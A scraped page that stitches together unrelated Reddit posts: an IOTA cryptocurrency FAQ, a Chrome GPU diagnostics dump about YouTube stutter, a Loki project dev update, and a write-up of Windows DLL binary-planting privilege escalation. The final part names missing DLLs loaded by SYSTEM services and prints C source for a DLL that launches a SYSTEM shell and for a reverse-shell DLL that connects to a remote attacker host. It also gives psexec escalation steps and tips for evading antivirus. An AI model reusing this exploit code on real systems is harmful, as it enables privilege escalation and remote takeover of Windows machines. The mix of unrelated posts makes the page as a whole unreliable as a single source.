IOTA is more decentralized than any blockchain crypto that relies on 5 pools of miners, all largely based in China. Furthermore, the coordinator is not a server in the dev’s basement that secretly processes all the transactions. It’s several nodes all around the globe that add milestone transactions to show the direction of the IF’s tangle within the DAG so people don’t accidentally follow a fork from a malicious actor. Anyone with the know-how can fork the tangle right now with a double-spend. But no one would follow their fork because the coordinator reveals which tangle is the legit IF one. If the coordinator wasn’t there (assuming low honest-transaction volume), there would be no way to discern which path to follow especially after the tangle diverges into forks of forks. Once throughout of honest transactions is significant enough, the “honest tangle” will replace the coordinated one and people will know which one to follow simply because it’s the biggest one in the room.
Referencing the coordinator is also optional.
Also, if you research and understand how IOTA intends to work without the coordinator, it’s easier to accept it for now as training wheels. I suggest reading pg 15 and on of the white paper analyzing in great depth how the network will defend different attack scenarios without a coordinator. For the past several months, IOTA foundation has been using St Petersburg college’s super computer to stress test IOTA and learn when they can turn the coordinator off. There will likely be a blog about the results soon.
This is another great read covering double spends on IOTA without a coordinator:
This too:
Also this correspondence with Vitalik and Come_from_Beyond
At the end of the day, outstanding claims require outstanding evidence and folks approaching IOTA with a “I’ll believe it when I see it” attitude is completely understandable. It’s all about your risk tolerance.

Can IOTA defend double spend attacks?

99% of these “but did they think about double spend attacks?” type questions could just be answered if people went and did their own research. Yes of course they thought about that. That’s like crypto101…

Will IOTA have smart contracts?

Yes -

Trinary vs binary?

"By using a ternary number system, the amount of devices and cycles can be reduced significantly. In contrast to two-state devices, multistate devices provide better radix economy with the option for further scaling"

Bitcoin with lightning network will make IOTA obsolete.

If you want lightning network, IOTA already released it. Called flash channels.

IOTA rolled its own crypto!
This is why:
Cybercrypt has been hired to review and audit it. IOTA is currently running SHA-3/KECCAK now until Curl is ready.

MIT said bad things about IOTA
And for official formal closure that MIT was completely wrong:

Nick Johnson says IOTA is bad!

Nick Johnson is an ethereum dev who is incentivized to see IOTA fail, see CFBs twitter responses here.
And this
And this
And this

IOTA is not private!

Masked authenticated messages exist right now so data can be transferred privately. Very important for businesses.

Coin privacy

Centralized coin mixer is out that foundation runs. Logs are kept so they can collect data and improve it Folks can copy the coin mixer code and run it themselves. Goal is for mixer to be decentralized and ran by any node.

How do nodes scale? How on earth can all that data be stored?

Full nodes store, update and verify from the last snapshot, which happens roughly every month. Its on the roadmap to make snapshotting automatic and up to each full node’s discretion.With automatic snapshots, each full node will act as a partial perma-node and choose when to snapshot its tangle data. If someone wants to keep their tangle data for several months or even years, they could just choose not to snapshot. Or if they are limited on hard drive space, they could snapshot every week.
Perma-nodes would store the entire history of the tangle from the genesis. These are optional and would likely only be created by companies who wish to sell historical access of the tangle as a service or companies who heavily use the tangle for their own data and want to have quick, convenient access to their data’s history.
Swarm nodes are also in development which will ease the burden on full nodes.

Node discovery is manual? Wtf?

Nelson is fixing has fixed this:

IOTA open source?
IOTA protocol is open source. The coordinator is closed source open source.

Foundation moved user's funds?

My IOTA donation address:

submitted by mufinz2 to Iota [link] [comments]

YouTube fullscreen stutter

Just like the title says: I'm getting a weird stutter every 3 seconds when playing youtube videos in full screen. Hardware acceleration on or off does not matter. I have a GTX 1060, even 4k should be no problem. Did anyone run into this issue?
Graphics Feature Status Canvas: Hardware accelerated Flash: Hardware accelerated Flash Stage3D: Hardware accelerated Flash Stage3D Baseline profile: Hardware accelerated Compositing: Hardware accelerated Multiple Raster Threads: Enabled Out-of-process Rasterization: Disabled Hardware Protected Video Decode: Hardware accelerated Rasterization: Hardware accelerated Skia Renderer: Disabled Video Decode: Hardware accelerated Viz Display Compositor: Enabled Viz Hit-test Surface Layer: Disabled WebGL: Hardware accelerated WebGL2: Hardware accelerated Driver Bug Workarounds clear_uniforms_before_first_program_use decode_encode_srgb_for_generatemipmap disable_delayed_copy_nv12 disable_direct_composition_layers disable_discard_framebuffer exit_on_context_lost force_cube_complete scalarize_vec_and_mat_constructor_args disabled_extension_GL_KHR_blend_equation_advanced disabled_extension_GL_KHR_blend_equation_advanced_coherent Problems Detected Some drivers are unable to reset the D3D device in the GPU process sandbox Applied Workarounds: exit_on_context_lost Clear uniforms before first program use on all platforms: 124764, 349137 Applied Workarounds: clear_uniforms_before_first_program_use Always rewrite vec/mat constructors to be consistent: 398694 Applied Workarounds: scalarize_vec_and_mat_constructor_args ANGLE crash on glReadPixels from incomplete cube map texture: 518889 Applied Workarounds: force_cube_complete Framebuffer discarding can hurt performance on non-tilers: 570897 Applied Workarounds: disable_discard_framebuffer Disable KHR_blend_equation_advanced until cc shaders are updated: 661715 Applied Workarounds: disable(GL_KHR_blend_equation_advanced), disable(GL_KHR_blend_equation_advanced_coherent) Decode and Encode before generateMipmap for srgb format textures on Windows: 634519 Applied Workarounds: decode_encode_srgb_for_generatemipmap Delayed copy NV12 displays incorrect colors on NVIDIA drivers.: 728670 Applied Workarounds: disable_delayed_copy_nv12 Hardware overlays result in black videos on non-Intel GPUs: 932879 Applied Workarounds: disable_direct_composition_layers ANGLE Features disable_program_caching_for_transform_feedback (Frontend workarounds): Disabled On Qualcomm GPUs, program binaries don't contain transform feedback varyings lose_context_on_out_of_memory (Frontend workarounds): Enabled Some users rely on a lost context notification if a GL_OUT_OF_MEMORY error occurs scalarize_vec_and_mat_constructor_args (Frontend workarounds) 398694: Enabled Always rewrite vec/mat constructors to be consistent sync_framebuffer_bindings_on_tex_image (Frontend workarounds): Disabled On Windows Intel OpenGL drivers TexImage sometimes seems to interact with the Framebuffer add_dummy_texture_no_render_target (D3D workarounds) anglebug:2152: Disabled On D3D ntel drivers <4815 when rendering with no render target, two bugs lead to incorrect behavior allow_clear_for_robust_resource_init (D3D workarounds) 941620: Disabled Some drivers corrupt texture data when clearing for robust resource initialization. call_clear_twice (D3D workarounds) 655534: Disabled On some Intel drivers, using clear() may not take effect depth_stencil_blit_extra_copy (D3D workarounds) anglebug:1452: Disabled Bug in NVIDIA D3D11 Driver version <=347.88 and >368.81 triggers a TDR when using CopySubresourceRegion from a staging texture to a depth/stencil disable_b5g6r5_support (D3D workarounds): Disabled On Intel and AMD drivers, textures with the format DXGI_FORMAT_B5G6R5_UNORM have incorrect data emulate_isnan_float (D3D workarounds) 650547: Disabled On some Intel drivers, using isnan() on highp float will get wrong answer emulate_tiny_stencil_textures (D3D workarounds): Disabled On some AMD drivers, 1x1 and 2x2 mips of depth/stencil textures aren't sampled correctly expand_integer_pow_expressions (D3D workarounds): Enabled The HLSL optimizer has a bug with optimizing 'pow' in certain integer-valued expressions flush_after_ending_transform_feedback (D3D workarounds): Enabled NVIDIA drivers sometimes write out-of-order results to StreamOut buffers when transform feedback is used to repeatedly write to the same buffer positions force_atomic_value_resolution (D3D workarounds) anglebug:3246: Enabled On an NVIDIA D3D driver, the return value from RWByteAddressBuffer.InterlockedAdd does not resolve when used in the .yzw components of a RWByteAddressBuffer.Store operation get_dimensions_ignores_base_level (D3D workarounds): Enabled Some NVIDIA drivers do not take into account the base level of the texture in the results of the HLSL GetDimensions builtin mrt_perf_workaround (D3D workarounds): Enabled Some NVIDIA D3D11 drivers have a bug where they ignore null render targets pre_add_texel_fetch_offsets (D3D workarounds): Disabled On some Intel drivers, HLSL's function texture.Load returns 0 when the parameter Location is negative, even if the sum of Offset and Location is in range rewrite_unary_minus_operator (D3D workarounds): Disabled On some Intel drivers, evaluating unary minus operator on integer may get wrong answer in vertex shaders select_view_in_geometry_shader (D3D workarounds): Disabled The viewport or render target slice will be selected in the geometry shader stage for the ANGLE_multiview extension set_data_faster_than_image_upload (D3D workarounds): Enabled Set data faster than image upload skip_vs_constant_register_zero (D3D workarounds): Enabled On NVIDIA D3D driver v388.59 in specific cases the driver doesn't handle constant register zero correctly use_instanced_point_sprite_emulation (D3D workarounds): Disabled Some D3D11 renderers do not support geometry shaders for pointsprite emulation use_system_memory_for_constant_buffers (D3D workarounds) 593024: Disabled On some Intel drivers, copying from staging storage to constant buffer storage does not work zero_max_lod (D3D workarounds): Disabled D3D11 is missing an option to disable mipmaps on a mipmapped texture Version Information Data exported 2019-09-19T22:36:16.565Z Chrome version Chrome/77.0.3865.90 Operating system Windows NT 10.0.17763 Software rendering list URL Driver bug list URL ANGLE commit id 7cf862c9fcd2 2D graphics backend Skia/77 a10014304cba4f24b7af17191f59490faa8aee77 Command Line "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --flag-switches-begin --ignore-gpu-blacklist --enable-features=D3D11VideoDecoder --flag-switches-end Driver Information Initialization time 1000 In-process GPU false Passthrough Command Decoder true Sandboxed true GPU0 VENDOR = 0x10de [Google Inc.], DEVICE= 0x1c03 [ANGLE (NVIDIA GeForce GTX 1060 6GB Direct3D11 vs_5_0 ps_5_0)] ACTIVE Optimus false AMD switchable false Desktop compositing Aero Glass Direct composition true Supports overlays false YUY2 overlay support NONE NV12 overlay support NONE Diagonal Monitor Size of \.\DISPLAY2 31.9" Diagonal Monitor Size of \.\DISPLAY2 23.0" Driver D3D12 feature level D3D 12.1 Driver Vulkan API version Vulkan API 1.1.0 Driver vendor NVIDIA Driver version 436.30 Driver date 9-5-2019 GPU CUDA compute capability major version 6 Pixel shader version 5.0 Vertex shader version 5.0 Max. MSAA samples 8 Machine model name Machine model version GL_VENDOR Google Inc. GL_RENDERER ANGLE (NVIDIA GeForce GTX 1060 6GB Direct3D11 vs_5_0 ps_5_0) GL_VERSION OpenGL ES 2.0.0 (ANGLE GL_EXTENSIONS GL_ANGLE_client_arrays GL_ANGLE_depth_texture GL_ANGLE_explicit_context GL_ANGLE_explicit_context_gles1 GL_ANGLE_framebuffer_blit GL_ANGLE_framebuffer_multisample GL_ANGLE_instanced_arrays GL_ANGLE_lossy_etc_decode GL_ANGLE_memory_size GL_ANGLE_multi_draw GL_ANGLE_multiview_multisample GL_ANGLE_pack_reverse_row_order GL_ANGLE_program_cache_control GL_ANGLE_provoking_vertex GL_ANGLE_request_extension GL_ANGLE_robust_client_memory GL_ANGLE_texture_compression_dxt3 GL_ANGLE_texture_compression_dxt5 GL_ANGLE_texture_usage GL_ANGLE_translated_shader_source GL_CHROMIUM_bind_generates_resource GL_CHROMIUM_bind_uniform_location GL_CHROMIUM_color_buffer_float_rgb GL_CHROMIUM_color_buffer_float_rgba GL_CHROMIUM_copy_compressed_texture GL_CHROMIUM_copy_texture GL_CHROMIUM_lose_context GL_CHROMIUM_sync_query GL_EXT_blend_func_extended GL_EXT_blend_minmax GL_EXT_color_buffer_half_float GL_EXT_debug_marker GL_EXT_discard_framebuffer GL_EXT_disjoint_timer_query GL_EXT_draw_buffers GL_EXT_float_blend GL_EXT_frag_depth GL_EXT_instanced_arrays GL_EXT_map_buffer_range GL_EXT_occlusion_query_boolean GL_EXT_read_format_bgra GL_EXT_robustness GL_EXT_sRGB GL_EXT_shader_texture_lod GL_EXT_texture_compression_bptc GL_EXT_texture_compression_dxt1 GL_EXT_texture_compression_s3tc_srgb GL_EXT_texture_filter_anisotropic GL_EXT_texture_format_BGRA8888 GL_EXT_texture_rg GL_EXT_texture_storage GL_EXT_unpack_subimage GL_KHR_debug GL_KHR_parallel_shader_compile GL_NV_EGL_stream_consumer_external GL_NV_fence GL_NV_pack_subimage GL_NV_pixel_buffer_object GL_OES_EGL_image GL_OES_EGL_image_external GL_OES_depth24 GL_OES_depth32 GL_OES_element_index_uint GL_OES_get_program_binary GL_OES_mapbuffer GL_OES_packed_depth_stencil GL_OES_rgb8_rgba8 GL_OES_standard_derivatives GL_OES_surfaceless_context GL_OES_texture_3D GL_OES_texture_border_clamp GL_OES_texture_float GL_OES_texture_float_linear GL_OES_texture_half_float GL_OES_texture_half_float_linear GL_OES_texture_npot GL_OES_vertex_array_object OES_compressed_EAC_R11_signed_texture OES_compressed_EAC_R11_unsigned_texture OES_compressed_EAC_RG11_signed_texture OES_compressed_EAC_RG11_unsigned_texture OES_compressed_ETC2_RGB8_texture OES_compressed_ETC2_RGBA8_texture OES_compressed_ETC2_punchthroughA_RGBA8_texture OES_compressed_ETC2_punchthroughA_sRGB8_alpha_texture OES_compressed_ETC2_sRGB8_alpha8_texture OES_compressed_ETC2_sRGB8_texture Disabled Extensions GL_KHR_blend_equation_advanced GL_KHR_blend_equation_advanced_coherent Disabled WebGL Extensions Window system binding vendor Google Inc. (adapter LUID: 0000000000213440) Window system binding version 1.4 (ANGLE Window system binding extensions EGL_EXT_create_context_robustness EGL_ANGLE_d3d_share_handle_client_buffer EGL_ANGLE_d3d_texture_client_buffer EGL_ANGLE_surface_d3d_texture_2d_share_handle EGL_ANGLE_query_surface_pointer EGL_ANGLE_window_fixed_size EGL_ANGLE_keyed_mutex EGL_ANGLE_surface_orientation EGL_ANGLE_direct_composition EGL_ANGLE_windows_ui_composition EGL_NV_post_sub_buffer EGL_KHR_create_context EGL_EXT_device_query EGL_KHR_image EGL_KHR_image_base EGL_KHR_gl_texture_2D_image EGL_KHR_gl_texture_cubemap_image EGL_KHR_gl_renderbuffer_image EGL_KHR_get_all_proc_addresses EGL_KHR_stream EGL_KHR_stream_consumer_gltexture EGL_NV_stream_consumer_gltexture_yuv EGL_ANGLE_flexible_surface_compatibility EGL_ANGLE_stream_producer_d3d_texture EGL_ANGLE_create_context_webgl_compatibility EGL_CHROMIUM_create_context_bind_generates_resource EGL_CHROMIUM_sync_control EGL_EXT_pixel_format_float EGL_KHR_surfaceless_context EGL_ANGLE_display_texture_share_group EGL_ANGLE_create_context_client_arrays EGL_ANGLE_program_cache_control EGL_ANGLE_robust_resource_initialization EGL_ANGLE_create_context_extensions_enabled EGL_ANDROID_blob_cache EGL_ANDROID_recordable EGL_ANGLE_image_d3d11_texture EGL_ANGLE_create_context_backwards_compatible Direct rendering version unknown Reset notification strategy 0x8252 GPU process crash count 0 gfx::BufferFormats supported for allocation and texturing R_8: not supported, R_16: not supported, RG_88: not supported, BGR_565: not supported, RGBA_4444: not supported, RGBX_8888: not supported, RGBA_8888: not supported, BGRX_8888: not supported, BGRX_1010102: not supported, RGBX_1010102: not supported, BGRA_8888: not supported, RGBA_F16: not supported, YVU_420: not supported, YUV_420_BIPLANAR: not supported, UYVY_422: not supported, P010: not supported Compositor Information Tile Update Mode One-copy Partial Raster Enabled GpuMemoryBuffers Status R_8 Software only R_16 Software only RG_88 Software only BGR_565 Software only RGBA_4444 Software only RGBX_8888 GPU_READ, SCANOUT RGBA_8888 GPU_READ, SCANOUT BGRX_8888 Software only BGRX_1010102 Software only RGBX_1010102 Software only BGRA_8888 Software only RGBA_F16 Software only YVU_420 Software only YUV_420_BIPLANAR Software only UYVY_422 Software only P010 Software only Display(s) Information Info Display[2779098405] bounds=[0,0 1536x864], workarea=[0,0 1536x824], scale=1.25, external. Color space information {primaries:BT709, transfer:IEC61966_2_1, matrix:RGB, range:FULL} SDR white level in nits 80 Bits per color component 8 Bits per pixel 24 Refresh Rate in Hz 60 Video Acceleration Information Decode h264 baseline up to 4096x2304 pixels Decode h264 baseline up to 2304x4096 pixels Decode h264 main up to 4096x2304 pixels Decode h264 main up to 2304x4096 pixels Decode h264 high up to 4096x2304 pixels Decode h264 high up to 2304x4096 pixels Decode vp9 profile0 up to 8192x8192 pixels Decode vp9 profile0 up to 8192x8192 pixels Encode h264 baseline up to 3840x2176 pixels and/or 30.000 fps Encode h264 main up to 3840x2176 pixels and/or 30.000 fps Encode h264 high up to 3840x2176 pixels and/or 30.000 fps Diagnostics 0 b3DAccelerationEnabled true b3DAccelerationExists true bAGPEnabled true bAGPExistenceValid true bAGPExists true bCanRenderWindow true bDDAccelerationEnabled true bDriverBeta false bDriverDebug false bDriverSigned false bDriverSignedValid false bNoHardware false dwBpp 32 dwDDIVersion 12 dwHeight 1080 dwRefreshRate 60 dwWHQLLevel 0 dwWidth 1920 iAdapter 0 lDriverSize 961896 lMiniVddSize 0 szAGPStatusEnglish Enabled szAGPStatusLocalized Enabled szChipType GeForce GTX 1060 6GB szD3DStatusEnglish Enabled szD3DStatusLocalized Enabled szDACType Integrated RAMDAC szDDIVersionEnglish 12 szDDIVersionLocalized 12 szDDStatusEnglish Enabled szDDStatusLocalized Enabled szDXVAHDEnglish Supported szDXVAModes szDescription NVIDIA GeForce GTX 1060 6GB szDeviceId 0x1C03 szDeviceIdentifier {D7B71E3E-5F43-11CF-DC55-6F411BC2D735} szDeviceName \.\DISPLAY2 szDisplayMemoryEnglish 14219 MB szDisplayMemoryLocalized 14219 MB szDisplayModeEnglish 1920 x 1080 (32 bit) (60Hz) szDisplayModeLocalized 1920 x 1080 (32 bit) (60Hz) szDriverAssemblyVersion szDriverAttributes Final Retail szDriverDateEnglish 05/09/2019 03:00:00 szDriverDateLocalized 9/5/2019 03:00:00 szDriverLanguageEnglish English szDriverLanguageLocalized English szDriverModelEnglish WDDM 2.5 szDriverModelLocalized WDDM 2.5 szDriverName C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_830a0263f2ee97ce\nvldumdx.dll,C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_830a0263f2ee97ce\nvldumdx.dll,C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_830a0263f2ee97ce\nvldumdx.dll,C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_830a0263f2ee97ce\nvldumdx.dll szDriverNodeStrongName oem12.inf:0f066de38c1ebff8:Section094:\ven_10de&dev_1c03 szDriverSignDate Unknown szDriverVersion 26.21.0014.3630 szKeyDeviceID Enum\PCI\VEN_10DE&DEV_1C03&SUBSYS_61613842&REV_A1 szKeyDeviceKey \Registry\Machine\System\CurrentControlSet\Control\Video{81D81F87-DB28-11E9-B156-D43D7E9345F6}\0000 szManufacturer NVIDIA szMiniVdd unknown szMiniVddDateEnglish Unknown szMiniVddDateLocalized unknown szMonitorMaxRes Unknown szMonitorName Generic PnP Monitor szNotesEnglish No problems found. szNotesLocalized No problems found. szOverlayEnglish Supported szRankOfInstalledDriver 00D12001 szRegHelpText Unknown szRevision Unknown szRevisionId 0x00A1 szSubSysId 0x61613842 szTestResultD3D7English Not run szTestResultD3D7Localized Not run szTestResultD3D8English Not run szTestResultD3D8Localized Not run szTestResultD3D9English Not run szTestResultD3D9Localized Not run szTestResultDDEnglish Not run szTestResultDDLocalized Not run szVdd unknown szVendorId 0x10DE Log Messages GpuProcessHost: The unsandboxed GPU process exited normally. Everything is okay. GpuProcessHost: The unsandboxed GPU process exited normally. Everything is okay. [12548:2044:0920/] : compileToBinary(259): C:\fakepath(75,10-46): warning X3571: pow(f, e) will not work for negative f, use abs(f) or conditionally handle negative values if you expect them C:\fakepath(97,10-46): warning X3571: pow(f, e) will not work for negative f, use abs(f) or conditionally handle negative values if you expect them
submitted by MegaDeox to chrome [link] [comments]

Weekly Dev Update 01/07/2019

Hey Y’all,

A big Dev Update this week – especially for Loki Core with lots of pull requests needing to be merged as we work towards a final release. Last week we released the Loki Core 4.0.0 Hefty Heimdall testnet binaries, and the Loki Storage Server 1.0.0 binaries. We also released a new version of the Loki Launcher to tie everything together.
We would love it if everyone could jump onto testnet and run some Service Nodes using the Loki Launcher in the next few weeks – you’ll be able to store messages for Loki Messenger for the first time! Bug reports are welcome! Please send them to their respective repositories on GitHub.

Loki Core
Loki Launcher
The Loki Launcher is a node JS package that will allow for the independent management of all the components required to run a full Service Node. This includes managing Lokinet, lokid and the Loki Storage Server. When Loki Service Nodes begin to route data and store messages for Lokinet and Loki Messenger, the Loki Launcher will need to be run on every single Service Node.
The Launcher is currently in a testing phase, so you should only use it on testnet and stagenet – feedback/issues and pull requests would be greatly appreciated though!
What’s going on this week with Loki Launcher:
This week we got Loki Launcher ready to work for testnet binaries. This involved slightly adjusting the way Loki Launcher works, particularly how it downloads new Loki software.
Github Pulse: Excluding merges, 2 authors have pushed 38 commits to master and 38 commits to all branches. On master, 16 files have changed and there have been 607 additions and 367 deletions.
If you’re on our Discord you might catch Jeff or Ryan, the developers of LLARP, live streaming as they code:,
What’s going on this week with Lokinet:
As part of our reliability work, we added more metrics and continued working on our path build failure messages, while cleaning up various things along the way. We also made sure the files Lokinet creates are of the correct permissions to avoid leaking any keys.
Pull Requests:
Loki Messenger Desktop
Storage Server
Messenger Mobile (iOS and Android)
submitted by Keejef to LokiProject [link] [comments]

A few binary plating 0-days for Windows

A few binary plating 0-days for Windows
A long time ago, while we were thinking about a way to escalate privileges during a pen-test, we discovered that most Windows installations were vulnerable to binary planting. We contacted Microsoft, but they claimed that it was not a product vulnerability since security had been weakened by 3rd party applications that allowed overly permissive file access. On the one hand this was correct, but on the other, those 3rd party applications (the publishers of which were also notified) were not the only ones to blame as the insecure DLL search path is definitively part of the operating system and tries to load another DLL from Microsoft which does not exist.
Anyway, sometime later I continued the research and start developing a tool in order to help detect similar vulnerabilities and exploit them. However, days are too short and I never managed to take the time to finish it. So, I decided to publish the few 0-days I still have on Windows in order to help other pen-testers while they still work.


The initial vulnerability that we discovered in October 2012 was related to the “Internet Key Exchange and Authenticated Internet Protocol Keying Modules”. Those modules are used for authentication and key exchange in Internet Protocol security. The problem was that they try to load a DLL which doesn’t exist. This leaves the operating system vulnerable to various binary planting opportunities that depend on the PATH environment variable.
In fact, the “IKE and AuthIP IPsec Keying Modules” service is started automatically under the “Local System” account and points to “svchost -k netsvcs” which then loads “IKEEXT.DLL”, which in turn attempts to call the missing “wlbsctrl.dll” file by looking in the following directories: the loading directory, %WINDIR%\System32, %WINDIR%\System, %WINDIR%, the current working directory, and %PATH%. If one of the folders from the PATH environment variable is writable, then any authenticated user can plant a nasty DLL file which will be executed as SYSTEM during the next reboot.
This binary planting can be exploited when a program gives too much access (e.g. Create Files / Write Data privilege for anybody) on a local subfolder that is ultimately added to the PATH environment variable. Such a problem is very frequent with the root folder since access permissions for files and subfolders are inherited from the parent directory when a directory is created in “C:\”. Members of the “Authenticated Users” group have the “Create Folders / Append Data” right on all directories created within the root folder, which may then offer an enticing privilege escalation vector. So, any member of the “Authenticated Users” group can escalate his privileges to “SYSTEM” when an application that does not restrict write access to its folder is installed and gets added to the system PATH environment variable. Something which occurs quite frequently. Additionally, many developers and sysadmins also modify the PATH manually to facilitate their daily duties or migration phases. This too will often permit an attacker to trigger the vulnerability.
From Microsoft’s point of view, the 3rd party vendors are to blame because the vendor’s installer didn’t remove the write permission on their application directory before adding it to the PATH. From the perspective of 3rd party vendors, Microsoft is to blame because Windows tries to search for another Microsoft DLL which doesn’t exist. While, in a sense, both are right, it is the end user who ultimately pays the price. Because neither Microsoft nor the 3rd party developers assumed their own responsibilities, Windows users stayed exposed for many years.
Others have since done a great job of automating the exploitation of the vulnerability, e.g.: “itm4n” created a PowerShell script to trigger the vulnerability by opening a dummy VPN connection with “rasdial” to force the vulnerable service to start. There is also a “ikeext_service” module in MSF thanks to “Meatballs”, which permits one to leverage an insecure path to plant your favorite Meterpreter.
Today the automated trigger is still far from being guaranteed and it often requires a reboot in order to load our malicious DLL as SYSTEM. This presents no issue for a Black Hat, but is quite limiting for a Red Team. So, the time had come to find other binary planting opportunities… This is why I started the Inseminator project, the goals of which were to:
  • Identify writable directories from the path.
  • Enumerate binaries involved by services which start as NT AUTHORITY\SYSTEM.
  • Generate a list of DLLs loaded by those services.
  • Parse those DLLs to identity other loading of DLLs and update the list accordingly.
  • Check if each of the DLLs in the list exists in a system directory.
  • Automate the exploitation by planting an arbitrary DLL in the right place with the right name and offering several payload opportunities.
Unfortunately, this project was put on stand-by for a long time and I couldn’t find the time to finish it. I will therefore publish today some raw findings.
Inseminator's output sample


The most interesting binary planting opportunities are the ones which are related to system services, since they permit escalation to the highest level of privileges on the target. To identify them, I simply used a logger for the payload and created a bunch of testing DLLs with a command like this one:
for /F "tokens=*" %A in (BinaryPlantingList.txt) do copy poc.dll.logger64 c:\Python27\%A 
It turns out that:
  • Upon startup the “svchost.exe” is executed with the “utcsvc” service group, which starts a single service called “DiagTrack” (i.e., the “Diagnostics Tracking Service”) by loading “C:\WINDOWS\system32\diagtrack.dll”. This library tries to load the missing DLL “diagtrack_wininternal.dll” several times per day.
  • The “diagtrack.dll” also tries to run the missing “WindowsPerformanceRecorderControl” and “diagtrack_win.dll” libraries from time to time (but less often than “diagtrack_wininternal.dll”).
  • The library “diagtrack_win.dll” is also called by the “Microsoft Compatibility Appraiser” system task, which is scheduled to run “C:\Windows\System32\CompatTel\diagtrackrunner.exe” at 3am by default (and runs whether a user is logged on or not).
  • The library “WindowsPerformanceRecorderControl.dll” is also invoked from time to time by other libraries, like from “C:\Windows\system32\TelLib.dll” or through the debugger engine with a call from “dbgeng.dll”.
The “Diagnostics Tracking Service” was initially pushed as an optional Windows 8.1 update (KB3022345) to collect personal data and send it back to Microsoft. However, these days this service is not really an option and is used by Microsoft to collect data about functional issues in most versions of Windows. So, it is maybe its fate to ultimately permit arbitrary code execution. This is yet another reason for end-users to not like this tracker. Moreover, it’s likely possible to trigger the call on demand by generating an error, since logs are collected when a functional problem is detected.
There is also some other insecure DLL loading brought by 3rd party applications. I, for example, have already witnessed McAfee VirusScan Enterprise engine trying to load a missing “mfebopa.dll”. A DLL which was initially intended to provide a behavioral “buffer overflow” protection, but in this case offered a substantial privilege escalation opportunity.
Tracking high-privileges libraries calls with DLL-based loggers
There are also some less interesting binary planting opportunities which still permit the loading of arbitrary libraries, but in the context of the current user. A vulnerability that is not as useful from a local privilege escalation perspective, but which may still open some doors on shared systems and kiosks. Firefox, for example, often tries to load the missing “dcomp.dll” library, and the ClickShare wireless presentation system from Barco always tries to load the Microsoft Direct3D library “d3d8.dll” which is not always present when users plug in the projector’s USB dongle.
Tracking low-privileges libraries calls with DLL-based loggers


Many 3rd party applications do contain a writable sub-folder which is part of the PATH environment variable. For example, I identified issues with Roxio, HP Digital Imaging, ACER eDataSecurity, Micros Systems OPERA, OpenView OmniBack, Novel Groupwise, IBM AppScan, Python, Perl, Ruby, TCL, PHP, MySQL, Zend, and many others. As a rule of thumb, development tools often permit an attacker to leverage these vulnerabilities.
In practice, the easiest way to get local admin rights on many Windows systems is to simply put your favorite DLL in a writable folder that is part of the %PATH% and give it the name of one of those missing system libraries. You then just need to wait and your code will be executed several times by the end of the day as NT AUTHORITY\SYSTEM (even if it’s a production server which is never rebooted).
The DLL will be executed by a system service and will therefore run in session 0, which is non-interactive. Since Vista, services are isolated that way to protect them from malicious code running in a user’s session (starting from session ID 1). However, this does not really present a problem to our exploit. If our payload tries to interact with the desktop (for example, by running a CMD), the “Interactive Services Detection” service will draw a blinking button on the taskbar and prompt the user to “view the message” and enjoy our code in the desktop from session 0. The “UI0Detect.exe” binary invoked by “Interactive Services Detection” has now been removed from Windows 10 v1803 and Windows Server 2019, but those OSes are not our targets here.
The Interactive Services Detection kindly permits us to interact with our payload running in session 0
Our planted DLL is running with the highest level of privileges
When we have our SYSTEM shell in session 0, we can then easily get another shell in the usual session 1, for example, with PSEXEC:
psexec -s -i 1 -d cmd.exe 
We can then close our original shell and return to the standard user desktop to keep enjoying a SYSTEM shell.
After removing the DLL calls monitoring, here is what’s left in the payload. This quick and dirty code will permit you to compile a DLL that runs a local shell when it gets loaded:
// Compiled with mingw64 in Codeblocks // Static compilation: -static-libgcc -static-libstdc++ // 64 bits compilation: -march=x86-64 -m64 // Linker options: --static -lwsock32 -lws2_32 #include "main.h" #include  extern "C" DLL_EXPORT BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: STARTUPINFO si; PROCESS_INFORMATION pi; memset(&si, 0, sizeof(si)); memset(&pi, 0, sizeof(pi)); DWORD creationFlags; si.cb=sizeof(STARTUPINFO); si.lpDesktop="winsta0\\default"; creationFlags=CREATE_NEW_CONSOLE; creationFlags|=CREATE_NEW_PROCESS_GROUP; creationFlags|=CREATE_BREAKAWAY_FROM_JOB; CreateProcess("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, FALSE, creationFlags, NULL, NULL, &si, &pi) ; break; case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return TRUE; } 
Obviously, we might prefer opening a shell on a remote system instead of the local target, thus avoiding local interactions with the desktop in session 0.
I advise against directly using a reverse Meterpreter, since it would be caught by any AV. A preferred way is to simply open a socket and spawn a reverse shell to an attacker-controlled system, and then to play with Mimikatz or Meterpreter injection in a second phase. Here is another quick and dirty code example which does just that:
// Compiled with mingw64 in Codeblocks // Static compilation: -static-libgcc -static-libstdc++ // Compiler options: -march=x86 [for 32 bits] or -march=x86-64 -m64 [for 64 bits] // Other compiler option: -Wno-write-strings // Linker options: --static -lwsock32 -lws2_32 #include  #include  #include  // Set you remote handler here: #define IPADDR "" #define PORT 443 using namespace std; SOCKET sock; int getSocket() { SOCKET sock; SOCKADDR_IN sin; sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0 ); sin.sin_addr.s_addr = inet_addr(IPADDR); sin.sin_family = AF_INET; sin.sin_port = htons(PORT); connect(sock, (SOCKADDR *)&sin, sizeof(sin)); return sock; } std::string InitMe() { sock = getSocket() ; STARTUPINFO siStartupInfo; PROCESS_INFORMATION piProcessInfo; memset(&siStartupInfo, 0, sizeof(siStartupInfo)); memset(&piProcessInfo, 0, sizeof(piProcessInfo)); siStartupInfo.cb = sizeof(siStartupInfo); siStartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; siStartupInfo.hStdInput = (HANDLE)sock; siStartupInfo.hStdOutput = (HANDLE)sock; siStartupInfo.hStdError = (HANDLE)sock; CreateProcess(0, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &siStartupInfo, &piProcessInfo); //WaitForSingleObject(piProcessInfo.hProcess, INFINITE); return "TRUE"; } extern "C" __declspec(dllexport) BOOL WINAPI 